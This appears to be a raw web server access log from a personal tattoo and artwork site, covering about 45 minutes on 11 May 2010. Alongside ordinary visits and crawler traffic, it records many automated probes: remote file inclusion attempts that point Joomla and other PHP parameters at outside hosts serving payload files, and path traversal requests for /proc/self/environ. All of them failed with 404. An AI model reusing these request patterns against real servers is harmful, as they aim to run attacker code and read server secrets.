216.118.130.127 - - [11/May/2010:17:53:55 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:55 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:55 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:55 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:55 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:55 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:55 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:55 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:55 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:55 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:54:07 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:54:07 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:54:07 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:54:07 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
87.250.255.243 - - [11/May/2010:17:55:19 -0500] "GET /logs/access_log.1271548800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [11/May/2010:17:56:26 -0500] "GET /logs/access_log.1190160000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.190.102.21 - - [11/May/2010:17:56:44 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
121.190.102.21 - - [11/May/2010:17:56:44 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
121.190.102.21 - - [11/May/2010:17:56:44 -0500] "GET /logs/access_log.1273190400//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
121.190.102.21 - - [11/May/2010:17:56:47 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
121.190.102.21 - - [11/May/2010:17:56:47 -0500] "GET /logs/access_log.1273190400%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 389 "-""Mozilla/5.0"
121.190.102.21 - - [11/May/2010:17:56:47 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
81.208.34.38 - - [11/May/2010:17:56:56 -0500] "GET //appserv/main.php?appserv_root=http://gbox.hobby-site.com/romanians//spaw/images/id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
81.208.34.38 - - [11/May/2010:17:56:56 -0500] "GET /logs//appserv/main.php?appserv_root=http://gbox.hobby-site.com/romanians//spaw/images/id1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
81.208.34.38 - - [11/May/2010:17:56:56 -0500] "GET /logs/access_log.1262476800//appserv/main.php?appserv_root=http://gbox.hobby-site.com/romanians//spaw/images/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
121.190.102.21 - - [11/May/2010:17:59:27 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
121.190.102.21 - - [11/May/2010:17:59:27 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
121.190.102.21 - - [11/May/2010:17:59:27 -0500] "GET /logs/access_log.1273190400%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 389 "-""Mozilla/5.0"
207.46.194.131 - - [11/May/2010:18:00:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.131 - - [11/May/2010:18:00:07 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [11/May/2010:18:00:32 -0500] "GET /logs/access_log.1207785600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.37.143.198 - - [11/May/2010:18:01:01 -0500] "GET /logs//netcat/modules/s_loadenv.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:18:01:01 -0500] "GET /logs/access_log.1273363200%20%20//netcat/modules/s_loadenv.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:18:01:01 -0500] "GET //netcat/modules/s_loadenv.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:18:01:01 -0500] "GET //netcat/modules/s_loadenv.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:18:01:01 -0500] "GET /logs//netcat/modules/s_loadenv.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
174.37.143.198 - - [11/May/2010:18:01:01 -0500] "GET /logs/access_log.1273363200%20%20//netcat/modules/s_loadenv.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:18:03:23 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:18:03:23 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:18:03:23 -0500] "GET /logs/access_log.1273190400%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 389 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:18:06:14 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:18:06:14 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:18:06:14 -0500] "GET /logs/access_log.1273190400//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:06:19 -0500] "GET /db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 290 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:06:19 -0500] "GET /logs/access_log.1268956800%20%20/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:06:19 -0500] "GET /logs/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:06:20 -0500] "GET /db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 290 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:06:20 -0500] "GET /logs/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:06:20 -0500] "GET /logs/access_log.1268956800%20%20/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
87.250.255.243 - - [11/May/2010:18:06:20 -0500] "GET /artwork/carousel.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [11/May/2010:18:06:27 -0500] "GET /db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 290 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:06:27 -0500] "GET /logs/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:06:27 -0500] "GET /logs/access_log.1265760000/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:06:27 -0500] "GET /logs/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:06:27 -0500] "GET /db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 290 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:06:27 -0500] "GET /logs/access_log.1265760000/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:06:32 -0500] "GET /logs/access_log.1262822400/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:06:32 -0500] "GET /logs/access_log.1262822400/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:06:35 -0500] "GET /logs/access_log.1270598400%20%20/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:06:36 -0500] "GET /logs/access_log.1270598400%20%20/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:07:02 -0500] "GET /db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 290 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:07:02 -0500] "GET /logs/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:07:02 -0500] "GET /logs/access_log.1268956800/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:07:04 -0500] "GET /db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 290 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:07:04 -0500] "GET /logs/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:07:04 -0500] "GET /logs/access_log.1268956800/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:07:11 -0500] "GET /logs/access_log.1270598400/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:07:14 -0500] "GET /logs/access_log.1270598400/db.php?path_local=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
212.227.66.249 - - [11/May/2010:18:10:36 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.227.66.249 - - [11/May/2010:18:10:36 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
95.131.64.69 - - [11/May/2010:18:11:43 -0500] "GET /logs/access_log.1262822400//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:18:11:43 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:18:11:43 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
67.195.112.180 - - [11/May/2010:18:12:55 -0500] "GET /logs/access_log.1205712000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [11/May/2010:18:13:41 -0500] "GET /artwork/menorahs.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.231 - - [11/May/2010:18:14:09 -0500] "GET /logs/access_log.1260489600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.241.177.123 - - [11/May/2010:18:14:28 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
95.131.64.69 - - [11/May/2010:18:14:49 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:18:14:49 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:18:14:49 -0500] "GET /logs/access_log.1273190400%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 389 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:16:05 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:16:05 -0500] "GET //skin/zero_vote/error.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:16:05 -0500] "GET /logs/access_log.1272067200//skin/zero_vote/error.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:16:11 -0500] "GET //skin/zero_vote/error.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:16:11 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:16:11 -0500] "GET /logs/access_log.1272067200//skin/zero_vote/error.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:16:29 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:16:29 -0500] "GET /logs/access_log.1272067200%20%20//skin/zero_vote/error.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:16:29 -0500] "GET //skin/zero_vote/error.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:16:34 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:16:34 -0500] "GET //skin/zero_vote/error.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:18:16:34 -0500] "GET /logs/access_log.1272067200%20%20//skin/zero_vote/error.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:18:16:44 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:18:16:44 -0500] "GET /logs/access_log.1273190400//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:18:16:44 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
65.55.215.168 - - [11/May/2010:18:17:13 -0500] "GET /logs/access_log.1262649600 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; ie8_onetbuild_xppl)"
65.55.215.168 - - [11/May/2010:18:17:13 -0500] "GET /logs/access_log.1262649600 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; ie8_onetbuild_xppl)"
216.127.70.140 - - [11/May/2010:18:18:52 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.65"
212.241.177.123 - - [11/May/2010:18:20:07 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
212.241.177.123 - - [11/May/2010:18:20:07 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.241.177.123 - - [11/May/2010:18:20:07 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.250.255.243 - - [11/May/2010:18:21:37 -0500] "GET /logs/access_log.1270771200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
93.105.51.63 - - [11/May/2010:18:21:47 -0500] "GET /logs/access_log.1262649600 HTTP/1.1" 404 310 "http://65.55.177.205/bvsandbox.aspx?dl=pl&mkt=pl-PL&lp=EN_PL&a=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1262649600""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; ie8_onetbuild_xppl)"
93.105.51.63 - - [11/May/2010:18:21:48 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; ie8_onetbuild_xppl)"
93.105.51.63 - - [11/May/2010:18:21:49 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Google Desktop/5.9.911.3589; http://desktop.google.com/)"
93.105.51.63 - - [11/May/2010:18:23:08 -0500] "GET /logs/access_log.1262649600 HTTP/1.1" 404 310 "http://65.55.177.205/bvsandbox.aspx?dl=pl&mkt=pl-PL&lp=EN_PL&a=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1262649600""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; ie8_onetbuild_xppl)"
93.105.51.63 - - [11/May/2010:18:23:09 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; ie8_onetbuild_xppl)"
65.55.215.168 - - [11/May/2010:18:23:16 -0500] "GET /logs/access_log.1262649600 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; ie8_onetbuild_xppl)"
65.55.215.168 - - [11/May/2010:18:23:16 -0500] "GET /logs/access_log.1262649600 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; ie8_onetbuild_xppl)"
93.105.51.63 - - [11/May/2010:18:23:25 -0500] "GET /logs/access_log.1262649600 HTTP/1.1" 404 310 "http://65.55.177.205/bvsandbox.aspx?dl=pl&mkt=pl-PL&from=en&to=pl&lp=EN_PL&a=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1262649600""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; ie8_onetbuild_xppl)"
65.55.215.168 - - [11/May/2010:18:23:34 -0500] "GET /logs/access_log.1262649600 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; ie8_onetbuild_xppl)"
65.55.215.168 - - [11/May/2010:18:23:34 -0500] "GET /logs/access_log.1262649600 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; ie8_onetbuild_xppl)"
207.46.13.52 - - [11/May/2010:18:28:39 -0500] "GET /logs/access_log.1216684800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [11/May/2010:18:34:21 -0500] "GET /artwork/trunks.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [11/May/2010:18:36:10 -0500] "GET /logs/access_log.1198800000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.241.177.123 - - [11/May/2010:18:37:40 -0500] "GET /logs/access_log.1273276800/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
